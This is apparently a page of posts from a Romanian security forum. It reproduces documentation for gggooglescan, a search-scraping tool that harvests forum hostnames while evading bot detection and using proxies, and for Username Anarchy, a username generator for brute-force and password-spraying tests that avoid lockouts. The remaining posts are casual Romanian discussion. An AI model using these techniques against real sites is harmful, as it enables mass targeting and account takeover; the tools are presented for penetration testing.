a word list to create a large quantity of shallow depth search queries. For example, if you wanted to gather a list of forums powered by the myBB software you could use the following search query, “MyBB Group. Copyright”. Google reports there are 79,500 results however it is not easy to obtain those results. Let’s try the following command which searches 200 pages of 10 results which will hopefully net 2000 results. ./gggooglescan -l mybb-forum.log -d 200 ‘”powered by mybb”‘ After just 46 pages and 464 results Google does not display a link to the next page and reports “In order to show you the most relevant results, we have omitted some entries very similar to the 457 already displayed.”. This query returned 374 unique hostnames. After this search completed, the IP address used was restricted from further searching due to bot detection. Using the horizontal search technique we can gain a larger list of mybb forums. ./gggooglescan -l mybb-forum-horizontal.log -d 1 -e ./wordlist ‘”powered by mybb”‘ This search was detected as bot activity after 47 combined dictionary words (a,aachen,aachen’s,aaliyah,…) and obtained 8236 results and 1231 unique hostnames. ./gggooglescan -l mybb-forum-horizontal2.log -d 4 -e ./wordlist ‘”powered by mybb”‘ This search got as far as ‘abbreviates’, the 62nd word in the list and yielded 2389 results, 721 unique hostnames Here are some results I got, your mileage may vary: ./gggooglescan -l mybb-forum-horizontal.log -d 1 -e ./wordlist ‘”powered by mybb”‘ Detected as a bot. Got 8236 results ./gggooglescan -l mybb-forum-horizontal2.log -d 4 -e ./wordlist ‘”powered by mybb”‘ Detected as a bot. Got 2389 results ./gggooglescan -s 2 -l mybb-forum-horizontal3.log -d 1 -e ./wordlist ” ” Avoided detection. Got over 10,000 results before i stopped it. ./gggooglescan -s 2 -l mybb-forum-horizontal4.log -d 1 -e ./wordlist ” ” Avoided detection. Got over 100,000 results before i stopped it ./gggooglescan -s 2 -l mybb-forum-horizontal5.log -d 1 -e ./wordlist ‘”powered by mybb”‘ Detected as a bot. Got 4612 results. ./gggooglescan -s 2 -l phpbb-forums2.log -d 1 -e ./wordlist “memberlist goto page” Avoided detection. Got over 6279 results. Search within a country Are you only interested in results in Australia? You can restrict your searches to a country with the -c parameter ./gggooglescan -c au hello Perhaps you want a large set of Australian hostnames. Try the following: ./gggooglescan -c au -d 5 -v -l aussie.log -e ./wordlist a Using Proxies Use the -x option to pass curl command line parameters. The following curl options control proxy usage: -x/–proxy Use HTTP proxy on given port –proxy-anyauth Pick “any” proxy authentication method (H) –proxy-basic Use Basic authentication on the proxy (H) –proxy-digest Use Digest authentication on the proxy (H) –proxy-negotiate Use Negotiate authentication on the proxy (H) –proxy-ntlm Use NTLM authentication on the proxy (H) -U/–proxy-user Set proxy user and password –socks4 SOCKS4 proxy on given host + port –socks4a SOCKS4a proxy on given host + port –socks5 SOCKS5 proxy on given host + port –socks5-hostname SOCKS5 proxy, pass host name to proxy –socks5-gssapi-service SOCKS5 proxy service name for gssapi –socks5-gssapi-nec Compatibility with NEC SOCKS5 server For example: gggooglescan -x “–socks5 localhost:1234? hax0r gggooglescan -x “–proxy localhost:8080 –proxy-user bob:12345? hax0r You can also specify proxy settings with environment variables which will be used by curl, for example: export ALL_PROXY=http://localhost:8118/ ./gggooglescan foo Making a Wordlist You can make a wordlist on a Unix system with a command such as: cat /usr/share/dict/words| tr ‘[:upper:]‘ ‘[:lower:]‘ | egrep “[a-z']” | sort -u > wordlist There are more wordlists at openwall.com Download gggooglescan-0.4.tar.gz Latest Version o.4, 18th April 2011 License GPLv3 Author urbanadventurer aka Andrew Horton gggooglescan
      • 1
      • Downvote
  18. Description Tools for generating usernames when penetration testing. Usernames are half the password brute force problem. This is useful for user account/password brute force guessing and username enumeration when usernames are based on the users’ names. By attempting a few weak passwords across a large set of user accounts, user account lockout thresholds can be avoided. Users’ names can be identified through a variety of methods: Web scraping employee names from LinkedIn, Facebook, and other social networks. Extracting metadata from document types such as PDF, Word, Excel, etc. This can be performed with FOCA. Common aliases, or self chosen usernames, from forums are also included. Usage Username Anarchy is a command line tool. Usage: ./username-anarchy [OPTIONS]... [firstname|first last|first middle last] Version: 0.2 NAMES --input-file, -i=FILE Input list of names. Can be CSV or TAB delimited. Valid column headings are: firstinitial,firstname, lastinitial,lastname,middleinitial,middlename --auto, -a Automatically generate names from a country or other lists. --country COUNTRY, -c COUNTRY can be one of the following datasets: PublicProfiler: argentina, austria, belgium, canada, china, denmark, france, germany, hungary, india, ireland, italy, luxembourg, netherlands, newzealand, norway, poland, serbia, slovenia, spain, sweden, switzerland, uk, us Other: Facebook - uses the Facebook top 10,000 first and last names --given-names=FILE Dictionary of given names --family-names=FILE Dictionary of family names --substitute, -s=STATE Control name substitutions. Valid values are 'on' and 'off'. Default: off Can substitute any part of a name not available. --max-substitutions, -m=NUM Limit quantity of substitutions per plugin. Default: -1 (Unlimited) USERNAME FORMAT --list-formats, -l List format plugins --select-format, -f=LIST Select format plugins by name. Comma delimited list --recognise, -r=USERNAME Recognise which format is in use for a username. This uses the Facebook dataset. Use verbose mode to show progress. MISC --verbose, -v Display plugin format comments in output and displays last name searches in plugin format recogniser --help, -h This help Example Usage You know the name of a user but not the username format ./username-anarchy anna key anna annakey anna.key annakey annak a.key akey kanna k.anna ... You know the username format and names of users ./username-anarchy --input-file ./test-names.txt --select-format first.last andrew.horton jim.vongrippenvud peter.otoole You know the server is in France: Note that -a or –auto is required when you do not specify any input names. ./username-anarchy --country france --auto martin bernard thomas durand richard robert petit moreau dubois simon martinsmith martinjohnson ... List username format plugins ./username-anarchy --list-formats Plugin name Example -------------------------------------------------------------------------------- first anna firstlast annakey first.last anna.key firstlast[8] annakey firstl annak f.last a.key flast akey lfirst kanna l.first k.anna lastf keya last key last.f key.a last.first key.anna FLast AKey first1 anna0,anna1,anna2 fl ak fmlast abkey firstmiddlelast annaboomkey fml abk FL AK FirstLast AnnaKey First.Last Anna.Key Last Key FML ABK Name Resources Names World Family Names Some common countries. Top 10 surnames and forenames https://secure.wikimedia.org/wikipedia/en/wiki/List_of_most_popular_given_names Most popular baby names in - compiled by BabyNameFacts.com top 100 baby names per country https://secure.wikimedia.org/wikipedia/en/wiki/List_of_most_common_surnames_in_Oceania Name Parsing: https://secure.wikimedia.org/wikipedia/en/wiki/Capitalization http://cpansearch.perl.org/src/KIMRYAN/Lingua-EN-NameParse-1.28/lib/Lingua/EN/NameParse.pm Lingua::EN::NameCase - search.cpan.org Website: Username Anarchy Direct Download: https://github.com/urbanadventurer/username-anarchy/archive/master.zip
  19. Nu o sa te angajeze nimeni daca spargi un site guvernamental, alea sunt filme. O sa ajungi cu siguranta dupra gratii si o sa fii futut in cur cativa ani la rand. Daca nu iti place programarea dar vrei sa faci, sa spargi, sa dregi, iti sugerez sa nu scapi sapunul. Citeste ce am scris mai sus, daca ai sa intelegi e bine iar daca nu, o sa pleci curand de pe aici.
  20. Suntem o comunitate de hackeri, sau cel putin astea vrem sa fim si asta vrem sa credem ca suntem. Din ce ai scris tu reiese ca hackerii sunt infractori. No more offtopic here.
  21. hacker != infractor Ti-ai cam dat cu firma in cap. On: Bun venit! Daca vrei sa inveti trebuie sa o iei cu inceputul. Faptul ca ti-ai facut un cont aici poate fi considerat ca si inceput. Iti recomand sa nu postezi prea des ci sa stai si sa citesti, sa inveti cam despre ce e vorba pe aici. Nu exista nici un program magic si ascuns care sa te faca "hacker" daca il folosesti, desii la inceput o sa te folosesti de astfel de programe. Daca esti inarmat cu multa curiozitate si rabdare, iti recomand ca atunci cand citesti ceva pe aici si nu stii despre ce se vorbeste sa cauti pe google si sa iti inbogatesti cunostiintele. Trebuie sa inveti engleza daca nu stii deja pentru ca majoritatea materialelor de calitate sunt scrise in engleza. Daca stii si engleza te poti apuca de programare. Nu uita niciodata ca adevartii hackeri isi construiesc ei propriile programe. Nu uita ca un hacker nu e cel care strica si sparge, e cel care ia ceva, il analizeaza si il modifica pentru a face ceva mai bun. Asta e mentalitatea unui hacker, ce vezi tu la tv, sunt doar infractori si nu cred ca o sa vrei sa ajungi dupa gratii. Bafta! Pentru ceilalti zmei de pe aici: Dupa ce am citit postul lui neme mi-am dat seama de o chestie. Daca noi care suntem mai vechi in comunitate nu ii educam pe cei noi si tineri, ne taiem singuri craca de sub picioare pentru ca nu mai are cine sa duca mai departe comunitatea in viitor. Lasati deoparte arongatele si arfele de mari cunoscatori si ajutati cu ceva util daca puteti.
  22. Asta am observat ca zice toata lumea, nu e o problema atat timp cad e doar o chetiune de obisnuinta/invatare si nu un defect de design. Asta e pentru ca din cate stiu se rezerva sistemului o anumita cantitate de memorie. Ms mult de review. +5rep Per total m-am cam convis si cred ca o sa il cumpar. Poate prind ceva vineri la black friday.
  23. Unde te crezi aici, la TV sa iti ceri scuze pentru reclama? Baiatul se descurca, face vizite de pe urma numelui domeniului. Ce treaba avem noi cu creative monkeys? Ai mai postat si la sugestii. Report motherfucker!
  24. Xperia SL, mi se pare cel mai elegant. - vine cu android ICS - din cate am auzit nu tine bateria prea mult Vezi si aici: https://rstcenter.com/forum/61951-pareri-sony-xperia-s-sl.rst
  25. Hai pe chat, te rog. Am niste intrebari. Daca nu, zi-mi cam cat de mult il folosesti intr-o zi.
×
×
  • Create New...